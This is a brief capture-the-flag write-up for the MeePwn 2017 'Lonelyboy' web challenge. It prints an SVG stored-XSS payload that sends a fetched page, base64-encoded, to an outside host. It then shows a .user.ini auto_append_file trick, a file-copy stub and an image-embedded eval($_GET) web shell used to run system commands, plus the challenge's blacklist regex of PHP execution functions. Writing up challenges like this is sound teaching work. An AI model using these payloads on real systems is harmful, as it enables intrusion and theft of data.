MeePwn - Lonelyboy [Web]
23 Jul. 2017
2 minute read

Very quick little write-up:

Get a friend account using xss in svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
	var xhr = new XMLHttpRequest();
	xhr.open('GET','/home.php?email_address_of_tsu_friend=m@m.de');

	xhr.onload = function () {
		var myImage = new Image(100, 200);
		myImage.src ='http://example.com:81/'+btoa(xhr.responseText);

	};
	xhr.send(null);
  </script>
</svg>

Now you can upload a small file (20 characters) without any blacklisted keywords (system, exec, `, …) or blacklisted ending (php, .ht*, …). We noticed the header X-Powered-By: PHP-fpm/5.6 so we uploaded a .user.ini file. This is a configuration INI file that works on a per-directory basis.

auto_append_file=xx

auto_append_file will automatically parsed the given file after the main file. So we can upload a 20 characters php file called xx. As this is to short for a real shell (is it? usort magic maybe?) we copy an image with php code in it to a shorter name, so we can auto_append include it. This way we do not have to deal with the character limit and keyword blacklist.

xx file will be included:

<?copy('1.jpg',1);

1.jpg is an image with <?=eval($_GET[1337]);?> as a comment:

1.jpg

Now we browse to upload/[md5]/index.php, so that 1.jpg will be copied to 1 and we can update the .user.ini file to point to it. Now we can execute code like this: upload/[md5]index.php?1337=system('ls');

Very interesting php-golf challenge, i had hoped i would find a 20 character full shell so this would work without the pictures. Shortest i could come up with was:

<?usort($_GET,$_GET[0]);

(24 characters) WORK IN PROGRESS!


Filter:

/(escapeshellarg|escapeshellcmd|exec|passthru|proc_close|proc_get_status|proc_nice|proc_open|proc_terminate|shell_exec|`|system|include|require|eval|assert|readfile|scandir)/i